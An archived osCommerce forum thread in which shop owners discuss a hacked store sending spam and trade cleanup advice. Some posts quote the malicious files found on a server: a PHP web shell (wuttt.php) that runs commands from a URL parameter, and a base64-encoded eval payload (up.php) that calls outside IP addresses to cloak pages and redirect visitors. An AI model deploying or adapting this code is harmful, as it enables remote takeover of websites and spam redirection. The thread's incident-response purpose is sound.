Jump to content

Archived

This topic is now archived and is closed to further replies.

talbot649

Spam Emails Being Sent

Recommended Posts

My Oscommerce store has also been hacked with email spam,As I noticed from a test customer name which I set up myself was sent spam.

 

Found that every .php file had a code on the first line which is not original.

How do they access all of my files?

Hackers should be sent to prison for life as this is a form of rape!

 

 

EXAMPLE OF CODE

<? /**/eval(base64_decode('aWYoZ

Share this post


Link to post
Share on other sites

My Oscommerce store has also been hacked with email spam,As I noticed from a test customer name which I set up myself was sent spam.

 

Found that every .php file had a code on the first line which is not original.

How do they access all of my files?

Hackers should be sent to prison for life as this is a form of rape!

 

 

EXAMPLE OF CODE

<? /**/eval(base64_decode('aWYoZ

Probably thru /admin/file_manager.php

 

Read this


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Share this post


Link to post
Share on other sites

Merry X MAS everyone,

 

Todey I found the same problem in my oscommers.

 

I deleted two files and one folder named yahoo in > images with file inedex.php inside ,

two other files are :

 

wuttt.php

<?php

error_reporting(0);

set_time_limit(60);

ini_set('safe_mode','Off');

$cmd = $_GET[x];

if(!empty($cmd)) {

function ex($cmd) {

if(@function_exists('exec')) {

$res = '';

@exec($cmd,$res);

$res = join("\n",$res);

echo $res."\n";

exit(0); }

if(@function_exists('shell_exec')) {

$res = '';

$res = shell_exec($cmd);

echo $res;

exit(0); }

if(function_exists('passthru')) {

$res = '';

@ob_start();

@passthru($cmd);

$res = @ob_get_contents();

@ob_end_clean();

echo $res;

exit(0); }

if(function_exists('system')) {

$res = '';

@ob_start();

@system($cmd);

$res = @ob_get_contents();

@ob_end_clean();

 

 

and second: up.php

content:

<!-- tyudfkuh85ujh -->

<?php

/*eval(base64_decode("aWYgKCRfR0VUWyJ0Il0hPSIiKXsNCg0KJHQ9YmFzZW5hbWUoJF9HRVRbInQiXSk7DQokeDE9ImdvLWVsc2V3aGVyZS5jb20iOw0KDQpmdW5jdGlvbiBpc19zZWFyY2hfZW5naW5lKCRyZWYpeyANCgkkc2VhcmNoX2VuZ2luZV9jaGVja19rZXl3b3JkcyA9IGFycmF5KCdnb29nbGUnLCd5YWhvbycsJ2FvbCcsJ2JpbmcnLCdtc24nLCdzZWFyY2gnKTsgDQoJZm9yZWFjaCgkc2VhcmNoX2VuZ2luZV9jaGVja19rZXl3b3JkcyBhcyAka2V5KXsgDQoJCWlmKHN0cmlzdHIoJHJlZiwgJGtleSkpeyANCgkJCXJldHVybiB0cnVlOyANCgkJfSANCgl9IA0KCXJldHVybiBmYWxzZTsgDQp9IA0KZnVuY3Rpb24gY3Jhd2xfcGFnZSgkdXJsKXsNCgkkY2ggPSBjdXJsX2luaXQgKCk7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCk7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9FTkNPRElORyAsICJnemlwIik7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9USU1FT1VULCAyMDApOw0KCWN1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVNFUkFHRU5ULCJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA1LjE7IGVuLUVOOyBydjoxLjcuMTIpIEdlY2tvLzIwMDUwOTE5IEZpcmVmb3gvMS4wLjciKTsNCgkkcmVzdWx0ID0gY3VybF9leGVjICgkY2gpOw0KCWN1cmxfY2xvc2UoJGNoKTsNCglyZXR1cm4gJHJlc3VsdDsNCn0NCg0KZnVuY3Rpb24gZ2VuX3BhZ2UoJGtleXdvcmQsJHJlbGF0ZWQpew0KCSR1cmw9Imh0dHA6Ly93d3cuZ29vZ2xlLmNvbS9zZWFyY2g/aGw9ZW4mY2xpZW50PW9wZXJhJm51bT0xMDAmcT0iLnVybGVuY29kZSgka2V5d29yZCkuIiZscj1sYW5nX2VuIjsNCgkkcmVzdWx0PWNyYXdsX3BhZ2UoJHVybCk7DQoJcHJlZ19tYXRjaF9hbGwoIiM8ZGl2IGNsYXNzPVwic1wiPiguKik8YnI+I1UiLCAkcmVzdWx0LCAkcmVzdWx0X3ByZWcpOw0KCSRzPWFycmF5KCk7DQoJZm9yICgkaT0wOyAkaTxjb3VudCgkcmVzdWx0X3ByZWdbMV0pOyAkaSsrKXsNCiAJCSRzbmlwcGV0PXRyaW0oJHJlc3VsdF9wcmVnWzFdWyRpXSk7DQogCQkkc25pcHBldD1zdHJpcF90YWdzKCRzbmlwcGV0LCc8ZW0+Jyk7DQogCQkkc25pcHBldD1zdHJfcmVwbGFjZSgnZW0+JywnYj4nLCRzbmlwcGV0KTsNCgkJJHNuaXBwZXQ9c3RyX3JlcGxhY2UoIi4uLiIsIiAuICIsJHNuaXBwZXQpOw0KCQkkc25pcHBldD1zdHJpcF90YWdzKCRzbmlwcGV0KTsNCgkJYXJyYXlfcHVzaCgkcywkc25pcHBldCk7DQovLwkJZWNobyAkc25pcHBldC4iXG4iOw0KCX0NCglzaHVmZmxlKCRzKTsNCg0KJGM9JzxodG1sPg0KPGhlYWQ+DQoJPHRpdGxlPg0KCQknLnVjd29yZHMoJGtleXdvcmQpLicJPC90aXRsZT4NCgk8bWV0YSBodHRwLWVxdWl2PUNvbnRlbnQtVHlwZSBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiLz4NCgk8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbiIvPg0KDQo8L2hlYWQ+DQo8Ym9keT4NCjxoMz4nLnN0cnRvdXBwZXIoJGtleXdvcmQpLic8L2gzPg0KJzsNCg0KaWYgKGNvdW50KCRyZWxhdGVkKT4wKXsNCiRjLj0nDQoJCQk8ZGl2Pg0KJzsNCglmb3JlYWNoKCRyZWxhdGVkIGFzICR2YWwpew0KCQlsaXN0KCRrZXksJG5vcm0pPWV4cGxvZGUoInwiLCR2YWwpOw0KCQkkYy49JzxhIGhyZWY9Ij90PScuJG5vcm0uJyI+Jy51Y3dvcmRzKCRrZXkpLic8L2E+PGJyPicuIlxuIjsNCgl9DQoNCiRjLj0nPC9kaXY+JzsNCg0KDQp9DQoNCiRjLj0nDQoJCQk8ZGl2Pg0KPFVMPg0KJzsNCglmb3IoJGk9MDskaTw0MDskaSsrKXsNCgkJJGMuPSI8TEk+Ii4kc1skaV0uIjwvTEk+ICI7DQoJfQ0KJGMuPScNCg0KPC9VTD4NCjwvYm9keT4NCg0KPC9odG1sPg0KJzsNCglyZXR1cm4gJGM7DQp9DQoNCg0KZnVuY3Rpb24gZ2V0X25ld190ZHMoJGYyKXsNCgkkdXJsPSJodHRwOi8vNzQuNTUuMzEuMTE0L3RyL2dldF90ZHMucGhwP2g9Ii4iZ28tZWxzZXdoZXJlLmNvbSI7DQoJJHRkcz1jcmF3bF9wYWdlKCR1cmwpOw0KCSRmPUBmb3BlbigkZjIsInciKTtAZndyaXRlKCRmLCR0ZHMuInwiLnRpbWUoKSk7QGZjbG9zZSgkZik7DQoJcmV0dXJuICR0ZHM7DQp9DQoNCg0KZnVuY3Rpb24gZ2V0X3BhZ2UoJGtleSl7DQoJJGZfbj0iLmZpbGVzLyIuJGtleS4iLmh0bWwiOw0KCWlmIChAZmlsZV9leGlzdHMoJGZfbikpIHJldHVybiBAZmlsZV9nZXRfY29udGVudHMoJGZfbik7DQoNCgkkdXJsPSJodHRwOi8vNzQuNTUuMzEuMTE0L3RyL2dldF9rZXlfcmVsYXRlZC5waHA/dD0iLnVybGVuY29kZSgka2V5KS4iJmg9Ii4iZ28tZWxzZXdoZXJlLmNvbSI7DQoJJHg9Y3Jhd2xfcGFnZSgkdXJsKTsNCg0KDQoJJHJlbD1leHBsb2RlKCJ+IiwkeCk7DQoNCgkkYz1AY291bnQoJHJlbCktMTsNCgkkcmVsYXRlZD1hcnJheSgpOw0KCWZvcigkaT0xOyRpPD0kYzskaSsrKXsNCgkJJHJlbGF0ZWRbJGldPSRyZWxbJGldOw0KCX0NCgkka2V5d29yZD0kcmVsWzBdOw0KCWlmICgka2V5d29yZD09IiIpew0KCQkka2V5d29yZD1zdHJfcmVwbGFjZSgiLSIsIiAiLCRrZXkpOw0KCX0NCgkkcmVzdWx0PWdlbl9wYWdlKCRrZXl3b3JkLCRyZWxhdGVkKTsNCg0KCSRmPUBmb3BlbigkZl9uLCJ3Iik7QGZ3cml0ZSgkZiwkcmVzdWx0KTtAZmNsb3NlKCRmKTsNCglyZXR1cm4gJHJlc3VsdDsNCn0NCg0KZnVuY3Rpb24gZ2V0X3Rkcygpew0KCSRmMj0iLmZpbGVzL2IubG9nIjsNCglpZiAoQGZpbGVfZXhpc3RzKCRmMikpew0KCQkkcj1AZmlsZV9nZXRfY29udGVudHMoJGYyKTsNCgkJbGlzdCgkdGRzLCRsYXN0X3QpPWV4cGxvZGUoInwiLCRyKTsNCgkJaWYgKCh0aW1lKCktJGxhc3RfdCkgPiAxMDApJHRkcz1nZXRfbmV3X3RkcygkZjIpOw0KCX1lbHNlew0KCQkkdGRzPWdldF9uZXdfdGRzKCRmMik7DQoJfQ0KCXJldHVybiAkdGRzOw0KfQ0KDQoJZnVuY3Rpb24gcmVkaXJlY3QoKQ0KCXsNCgkJJGZfbj0iLi8uZmlsZXMvY3VycmVudC50eHQiOw0KCQkkZl9rPSJjdXJyZW50LnR4dCI7DQoJCSRxcz0ibGFuZD00MiZhZmZpZD0zMzIyMCI7DQoJCWlmIChmaWxlbXRpbWUoJGZfbik8dGltZSgpLTM2MDAgfHwgZmlsZXNpemUoJGZfbik9PTApDQoJCXsNCgkJCSR1cmw9Y3Jhd2xfcGFnZSgiaHR0cDovLzkyLjQ4LjEyNy43Ni9kb21haW4ucGhwP3Bhc3N3b3JkPWQwY2QwNWJmNjE5MjY2YTA0NWRmYjRhMDE2NzUzYTM5Iik7DQoJCQkkZj1AZm9wZW4oJGZfbiwidyIpO0Bmd3JpdGUoJGYsJHVybCk7QGZjbG9zZSgkZik7DQoJCQkNCgkJfQ0KCQllbHNlDQoJCXsNCgkJCSR1cmw9ZmlsZV9nZXRfY29udGVudHMoJGZfbik7DQoJCX0NCgkJDQoJCSRsaW5rID0gJ2h0dHA6Ly8nLiR1cmwuJy9oaXRpbi5waHA/Jy4kcXM7DQoJCQ0KCQkvL3dpdGggY291bnRlcg0KCQkkdHh0ID0gJzwhRE9DVFlQRSBIVE1MIFBVQkxJQyAiLS8vVzNDLy9EVEQgSFRNTCA0LjAgVHJhbnNpdGlvbmFsLy9FTiI+DQo8aHRtbD4NCjxoZWFkPg0KPHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCIgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij48IS0tDQpDZD1kb2N1bWVudDtDcj0iJiIrTWF0aC5yYW5kb20oKTtDcD0iJnM9MSI7DQpDZC5jb29raWU9ImI9YiI7aWYoQ2QuY29va2llKUNwKz0iJmM9MSI7DQpDcCs9IiZ0PSIrKG5ldyBEYXRlKCkpLmdldFRpbWV6b25lT2Zmc2V0KCk7DQppZihzZWxmIT10b3ApQ3ArPSImZj0xIjsNCmlmKG5hdmlnYXRvci5qYXZhRW5hYmxlZCgpKUNwKz0iJmo9MSI7DQppZih0eXBlb2Yoc2NyZWVuKSE9XCd1bmRlZmluZWRcJylDcCs9IiZ3PSIrc2NyZWVuLndpZHRoKyImaD0iKw0Kc2NyZWVuLmhlaWdodCsiJmQ9Iisoc2NyZWVuLmNvbG9yRGVwdGg/c2NyZWVuLmNvbG9yRGVwdGg6c2NyZWVuLnBpeGVsRGVwdGgpOw0KQ2Qud3JpdGUoIjxzYyIrInJpcHQgc3JjPVwnaHR0cDovL2MuaGl0LnVhL2hpdD9pPTI0NjQ5Jmc9MCZ4PTMiK0NwK0NyKw0KIiZyPSIrZXNjYXBlKENkLnJlZmVycmVyKSsiJnU9Iitlc2NhcGUod2luZG93LmxvY2F0aW9uLmhyZWYpKyJcJz48L3NjIisicmlwdD4iKTsNCmxvY2F0aW9uLnJlcGxhY2UoIicuJGxpbmsuJyIpOw0KLy8tLT4NCjwvc2NyaXB0Pg0KPG5vc2NyaXB0Pg0KPG1ldGEgaHR0cC1lcXVpdj0iUmVmcmVzaCIgY29udGVudD0iMDsgVVJMPScuJGxpbmsuJyI+DQo8L25vc2NyaXB0Pg0KPC9oZWFkPg0KPGJvZHk+DQpQYWdlIHJlcGxhY2VkIDxhIGhyZWY9IicuJGxpbmsuJyI+dGhpczwvYT4uDQo8L2JvZHk+DQo8L2h0bWw+JzsNCgkJcmV0dXJuICR0eHQ7DQoJfQ0KDQoNCkBta2RpcigiLi8uZmlsZXMiKTsNCkBjaG1vZCgiLi8uZmlsZXMiLCAwNzc3KTsNCg0KaWYgKHN0cmlzdHIoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdLCJnb29nbGVib3QiKXx8c3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sInlhaG9vIikpew0KCW9iX3N0YXJ0KCJvYl9nemhhbmRsZXIiKTsNCgkkcmVzdWx0PWdldF9wYWdlKCR0KTsNCgllY2hvICRyZXN1bHQ7DQp9ZWxzZXsNCg0KCWlmIChpc19zZWFyY2hfZW5naW5lKCRfU0VSVkVSWyJIVFRQX1JFRkVSRVIiXSkpew0KCQlwcmludCByZWRpcmVjdCgpOw0KDQoJfWVsc2V7DQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9jbm4uY29tIik7DQoJfQ0KfQ0KDQoNCglleGl0Ow0KDQp9"));

*/

?>

 

additionaly I blocket two Russian's YANDEX IP : 95.108.128.241 and 77.88.31.247

For now online shop is working good without any mistake.

Best regards from Bulgaria!

Share this post


Link to post
Share on other sites

Merry X MAS everyone,

 

Todey I found the same problem in my oscommers.

 

I deleted two files and one folder named yahoo in > images with file inedex.php inside ,

two other files are :

 

wuttt.php

<?php

error_reporting(0);

set_time_limit(60);

ini_set('safe_mode','Off');

$cmd = $_GET[x];

if(!empty($cmd)) {

function ex($cmd) {

if(@function_exists('exec')) {

$res = '';

@exec($cmd,$res);

$res = join("\n",$res);

echo $res."\n";

exit(0); }

if(@function_exists('shell_exec')) {

$res = '';

$res = shell_exec($cmd);

echo $res;

exit(0); }

if(function_exists('passthru')) {

$res = '';

@ob_start();

@passthru($cmd);

$res = @ob_get_contents();

@ob_end_clean();

echo $res;

exit(0); }

if(function_exists('system')) {

$res = '';

@ob_start();

@system($cmd);

$res = @ob_get_contents();

@ob_end_clean();

 

 

and second: up.php

content:

<!-- tyudfkuh85ujh -->

<?php

/*eval(base64_decode("aWYgKCRfR0VUWyJ0Il0hPSIiKXsNCg0KJHQ9YmFzZW5hbWUoJF9HRVRbInQiXSk7DQokeDE9ImdvLWVsc2V3aGVyZS5jb20iOw0KDQpmdW5jdGlvbiBpc19zZWFyY2hfZW5naW5lKCRyZWYpeyANCgkkc2VhcmNoX2VuZ2luZV9jaGVja19rZXl3b3JkcyA9IGFycmF5KCdnb29nbGUnLCd5YWhvbycsJ2FvbCcsJ2JpbmcnLCdtc24nLCdzZWFyY2gnKTsgDQoJZm9yZWFjaCgkc2VhcmNoX2VuZ2luZV9jaGVja19rZXl3b3JkcyBhcyAka2V5KXsgDQoJCWlmKHN0cmlzdHIoJHJlZiwgJGtleSkpeyANCgkJCXJldHVybiB0cnVlOyANCgkJfSANCgl9IA0KCXJldHVybiBmYWxzZTsgDQp9IA0KZnVuY3Rpb24gY3Jhd2xfcGFnZSgkdXJsKXsNCgkkY2ggPSBjdXJsX2luaXQgKCk7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCk7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9FTkNPRElORyAsICJnemlwIik7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9USU1FT1VULCAyMDApOw0KCWN1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVNFUkFHRU5ULCJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA1LjE7IGVuLUVOOyBydjoxLjcuMTIpIEdlY2tvLzIwMDUwOTE5IEZpcmVmb3gvMS4wLjciKTsNCgkkcmVzdWx0ID0gY3VybF9leGVjICgkY2gpOw0KCWN1cmxfY2xvc2UoJGNoKTsNCglyZXR1cm4gJHJlc3VsdDsNCn0NCg0KZnVuY3Rpb24gZ2VuX3BhZ2UoJGtleXdvcmQsJHJlbGF0ZWQpew0KCSR1cmw9Imh0dHA6Ly93d3cuZ29vZ2xlLmNvbS9zZWFyY2g/aGw9ZW4mY2xpZW50PW9wZXJhJm51bT0xMDAmcT0iLnVybGVuY29kZSgka2V5d29yZCkuIiZscj1sYW5nX2VuIjsNCgkkcmVzdWx0PWNyYXdsX3BhZ2UoJHVybCk7DQoJcHJlZ19tYXRjaF9hbGwoIiM8ZGl2IGNsYXNzPVwic1wiPiguKik8YnI+I1UiLCAkcmVzdWx0LCAkcmVzdWx0X3ByZWcpOw0KCSRzPWFycmF5KCk7DQoJZm9yICgkaT0wOyAkaTxjb3VudCgkcmVzdWx0X3ByZWdbMV0pOyAkaSsrKXsNCiAJCSRzbmlwcGV0PXRyaW0oJHJlc3VsdF9wcmVnWzFdWyRpXSk7DQogCQkkc25pcHBldD1zdHJpcF90YWdzKCRzbmlwcGV0LCc8ZW0+Jyk7DQogCQkkc25pcHBldD1zdHJfcmVwbGFjZSgnZW0+JywnYj4nLCRzbmlwcGV0KTsNCgkJJHNuaXBwZXQ9c3RyX3JlcGxhY2UoIi4uLiIsIiAuICIsJHNuaXBwZXQpOw0KCQkkc25pcHBldD1zdHJpcF90YWdzKCRzbmlwcGV0KTsNCgkJYXJyYXlfcHVzaCgkcywkc25pcHBldCk7DQovLwkJZWNobyAkc25pcHBldC4iXG4iOw0KCX0NCglzaHVmZmxlKCRzKTsNCg0KJGM9JzxodG1sPg0KPGhlYWQ+DQoJPHRpdGxlPg0KCQknLnVjd29yZHMoJGtleXdvcmQpLicJPC90aXRsZT4NCgk8bWV0YSBodHRwLWVxdWl2PUNvbnRlbnQtVHlwZSBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiLz4NCgk8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbiIvPg0KDQo8L2hlYWQ+DQo8Ym9keT4NCjxoMz4nLnN0cnRvdXBwZXIoJGtleXdvcmQpLic8L2gzPg0KJzsNCg0KaWYgKGNvdW50KCRyZWxhdGVkKT4wKXsNCiRjLj0nDQoJCQk8ZGl2Pg0KJzsNCglmb3JlYWNoKCRyZWxhdGVkIGFzICR2YWwpew0KCQlsaXN0KCRrZXksJG5vcm0pPWV4cGxvZGUoInwiLCR2YWwpOw0KCQkkYy49JzxhIGhyZWY9Ij90PScuJG5vcm0uJyI+Jy51Y3dvcmRzKCRrZXkpLic8L2E+PGJyPicuIlxuIjsNCgl9DQoNCiRjLj0nPC9kaXY+JzsNCg0KDQp9DQoNCiRjLj0nDQoJCQk8ZGl2Pg0KPFVMPg0KJzsNCglmb3IoJGk9MDskaTw0MDskaSsrKXsNCgkJJGMuPSI8TEk+Ii4kc1skaV0uIjwvTEk+ICI7DQoJfQ0KJGMuPScNCg0KPC9VTD4NCjwvYm9keT4NCg0KPC9odG1sPg0KJzsNCglyZXR1cm4gJGM7DQp9DQoNCg0KZnVuY3Rpb24gZ2V0X25ld190ZHMoJGYyKXsNCgkkdXJsPSJodHRwOi8vNzQuNTUuMzEuMTE0L3RyL2dldF90ZHMucGhwP2g9Ii4iZ28tZWxzZXdoZXJlLmNvbSI7DQoJJHRkcz1jcmF3bF9wYWdlKCR1cmwpOw0KCSRmPUBmb3BlbigkZjIsInciKTtAZndyaXRlKCRmLCR0ZHMuInwiLnRpbWUoKSk7QGZjbG9zZSgkZik7DQoJcmV0dXJuICR0ZHM7DQp9DQoNCg0KZnVuY3Rpb24gZ2V0X3BhZ2UoJGtleSl7DQoJJGZfbj0iLmZpbGVzLyIuJGtleS4iLmh0bWwiOw0KCWlmIChAZmlsZV9leGlzdHMoJGZfbikpIHJldHVybiBAZmlsZV9nZXRfY29udGVudHMoJGZfbik7DQoNCgkkdXJsPSJodHRwOi8vNzQuNTUuMzEuMTE0L3RyL2dldF9rZXlfcmVsYXRlZC5waHA/dD0iLnVybGVuY29kZSgka2V5KS4iJmg9Ii4iZ28tZWxzZXdoZXJlLmNvbSI7DQoJJHg9Y3Jhd2xfcGFnZSgkdXJsKTsNCg0KDQoJJHJlbD1leHBsb2RlKCJ+IiwkeCk7DQoNCgkkYz1AY291bnQoJHJlbCktMTsNCgkkcmVsYXRlZD1hcnJheSgpOw0KCWZvcigkaT0xOyRpPD0kYzskaSsrKXsNCgkJJHJlbGF0ZWRbJGldPSRyZWxbJGldOw0KCX0NCgkka2V5d29yZD0kcmVsWzBdOw0KCWlmICgka2V5d29yZD09IiIpew0KCQkka2V5d29yZD1zdHJfcmVwbGFjZSgiLSIsIiAiLCRrZXkpOw0KCX0NCgkkcmVzdWx0PWdlbl9wYWdlKCRrZXl3b3JkLCRyZWxhdGVkKTsNCg0KCSRmPUBmb3BlbigkZl9uLCJ3Iik7QGZ3cml0ZSgkZiwkcmVzdWx0KTtAZmNsb3NlKCRmKTsNCglyZXR1cm4gJHJlc3VsdDsNCn0NCg0KZnVuY3Rpb24gZ2V0X3Rkcygpew0KCSRmMj0iLmZpbGVzL2IubG9nIjsNCglpZiAoQGZpbGVfZXhpc3RzKCRmMikpew0KCQkkcj1AZmlsZV9nZXRfY29udGVudHMoJGYyKTsNCgkJbGlzdCgkdGRzLCRsYXN0X3QpPWV4cGxvZGUoInwiLCRyKTsNCgkJaWYgKCh0aW1lKCktJGxhc3RfdCkgPiAxMDApJHRkcz1nZXRfbmV3X3RkcygkZjIpOw0KCX1lbHNlew0KCQkkdGRzPWdldF9uZXdfdGRzKCRmMik7DQoJfQ0KCXJldHVybiAkdGRzOw0KfQ0KDQoJZnVuY3Rpb24gcmVkaXJlY3QoKQ0KCXsNCgkJJGZfbj0iLi8uZmlsZXMvY3VycmVudC50eHQiOw0KCQkkZl9rPSJjdXJyZW50LnR4dCI7DQoJCSRxcz0ibGFuZD00MiZhZmZpZD0zMzIyMCI7DQoJCWlmIChmaWxlbXRpbWUoJGZfbik8dGltZSgpLTM2MDAgfHwgZmlsZXNpemUoJGZfbik9PTApDQoJCXsNCgkJCSR1cmw9Y3Jhd2xfcGFnZSgiaHR0cDovLzkyLjQ4LjEyNy43Ni9kb21haW4ucGhwP3Bhc3N3b3JkPWQwY2QwNWJmNjE5MjY2YTA0NWRmYjRhMDE2NzUzYTM5Iik7DQoJCQkkZj1AZm9wZW4oJGZfbiwidyIpO0Bmd3JpdGUoJGYsJHVybCk7QGZjbG9zZSgkZik7DQoJCQkNCgkJfQ0KCQllbHNlDQoJCXsNCgkJCSR1cmw9ZmlsZV9nZXRfY29udGVudHMoJGZfbik7DQoJCX0NCgkJDQoJCSRsaW5rID0gJ2h0dHA6Ly8nLiR1cmwuJy9oaXRpbi5waHA/Jy4kcXM7DQoJCQ0KCQkvL3dpdGggY291bnRlcg0KCQkkdHh0ID0gJzwhRE9DVFlQRSBIVE1MIFBVQkxJQyAiLS8vVzNDLy9EVEQgSFRNTCA0LjAgVHJhbnNpdGlvbmFsLy9FTiI+DQo8aHRtbD4NCjxoZWFkPg0KPHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCIgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij48IS0tDQpDZD1kb2N1bWVudDtDcj0iJiIrTWF0aC5yYW5kb20oKTtDcD0iJnM9MSI7DQpDZC5jb29raWU9ImI9YiI7aWYoQ2QuY29va2llKUNwKz0iJmM9MSI7DQpDcCs9IiZ0PSIrKG5ldyBEYXRlKCkpLmdldFRpbWV6b25lT2Zmc2V0KCk7DQppZihzZWxmIT10b3ApQ3ArPSImZj0xIjsNCmlmKG5hdmlnYXRvci5qYXZhRW5hYmxlZCgpKUNwKz0iJmo9MSI7DQppZih0eXBlb2Yoc2NyZWVuKSE9XCd1bmRlZmluZWRcJylDcCs9IiZ3PSIrc2NyZWVuLndpZHRoKyImaD0iKw0Kc2NyZWVuLmhlaWdodCsiJmQ9Iisoc2NyZWVuLmNvbG9yRGVwdGg/c2NyZWVuLmNvbG9yRGVwdGg6c2NyZWVuLnBpeGVsRGVwdGgpOw0KQ2Qud3JpdGUoIjxzYyIrInJpcHQgc3JjPVwnaHR0cDovL2MuaGl0LnVhL2hpdD9pPTI0NjQ5Jmc9MCZ4PTMiK0NwK0NyKw0KIiZyPSIrZXNjYXBlKENkLnJlZmVycmVyKSsiJnU9Iitlc2NhcGUod2luZG93LmxvY2F0aW9uLmhyZWYpKyJcJz48L3NjIisicmlwdD4iKTsNCmxvY2F0aW9uLnJlcGxhY2UoIicuJGxpbmsuJyIpOw0KLy8tLT4NCjwvc2NyaXB0Pg0KPG5vc2NyaXB0Pg0KPG1ldGEgaHR0cC1lcXVpdj0iUmVmcmVzaCIgY29udGVudD0iMDsgVVJMPScuJGxpbmsuJyI+DQo8L25vc2NyaXB0Pg0KPC9oZWFkPg0KPGJvZHk+DQpQYWdlIHJlcGxhY2VkIDxhIGhyZWY9IicuJGxpbmsuJyI+dGhpczwvYT4uDQo8L2JvZHk+DQo8L2h0bWw+JzsNCgkJcmV0dXJuICR0eHQ7DQoJfQ0KDQoNCkBta2RpcigiLi8uZmlsZXMiKTsNCkBjaG1vZCgiLi8uZmlsZXMiLCAwNzc3KTsNCg0KaWYgKHN0cmlzdHIoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdLCJnb29nbGVib3QiKXx8c3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sInlhaG9vIikpew0KCW9iX3N0YXJ0KCJvYl9nemhhbmRsZXIiKTsNCgkkcmVzdWx0PWdldF9wYWdlKCR0KTsNCgllY2hvICRyZXN1bHQ7DQp9ZWxzZXsNCg0KCWlmIChpc19zZWFyY2hfZW5naW5lKCRfU0VSVkVSWyJIVFRQX1JFRkVSRVIiXSkpew0KCQlwcmludCByZWRpcmVjdCgpOw0KDQoJfWVsc2V7DQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9jbm4uY29tIik7DQoJfQ0KfQ0KDQoNCglleGl0Ow0KDQp9"));

*/

?>

 

additionaly I blocket two Russian's YANDEX IP : 95.108.128.241 and 77.88.31.247

For now online shop is working good without any mistake.

Best regards from Bulgaria!

 

You've been hacked. Deleting those two files almost certainly won't be enough to clean your site and certainly won't be enough to stop them coming back in. You need to use the Site Monitor addon to detect all suspect files and clean out any malicious code or delete rogue files, or else restore from a clean backup and then apply all the measures here

 

Blocking Yandex isn't going to help either.


www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!

Share this post


Link to post
Share on other sites

Thank you for information Ben,

I will clean whole host account but next week.

All the best!

By which time you might have a whole lot more to clean, a whole lot of spam emails might have been sent out to your customer base or others, which might just damage your site's reputation a bit, google and other search engines might list it as harbouring malware, etc but your choice....


www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!

Share this post


Link to post
Share on other sites

Thank you Ben, you are 100% right.

I find other two folders and deleted it .One was .files and .cache .in each folders I found 100 html files with link .I think the probelms for now are captured. Tommorow will fight again with hacked files.

Thanks again!

Share this post


Link to post
Share on other sites

Taking care and messures myself after an attack of spam emails to customers.

So this thread along with:

How to secure your site

Security Issues with admin Directory

Security hole found in OsCommerce

and...

How do I install a contribution or addons?

Has been very helpful.

 

However... Many of us are new here and new to OsC and PHP and Database. We do our best and thanks to many people around this forum we can get help. But many tend to forget that they were too once new and explaine things kind of loosely. Newbies need help and to prevent more grey hairs then necessary, please please please, try to remeber how it was for you at first and explaine as "1-2-3" and easy as possible.

Don't get me wrong now. I'm so very very greatful to all of those who take the time and effort to help us "FNG's". So, a big and honest THANK YOU! to all of you.

 

Also... I'm getting alot of visits for two particular IP numbers (or IP ranges).

These are... 77.88.27.27 - spider29.yandex.ru, Moscow, 48-, Organization Yandex enterprise network, RU, Russian Federation.

and... 67.195.115.242 - b3090874.crawl.yahoo.net, Sunnyvale, CA 94089, Organization YAHOO, US, United States.

Would any of these perhaps explaine the strange folder "yahoo" that was mentioned earlier?

 

Thanks to all again... Thanks!


"I follow no path in life... Instead I walk straight and leave a trail for others to follow..."

www.bandofhand.se

Share this post


Link to post
Share on other sites

 

Also... I'm getting alot of visits for two particular IP numbers (or IP ranges).

These are... 77.88.27.27 - spider29.yandex.ru, Moscow, 48-, Organization Yandex enterprise network, RU, Russian Federation.

and... 67.195.115.242 - b3090874.crawl.yahoo.net, Sunnyvale, CA 94089, Organization YAHOO, US, United States.

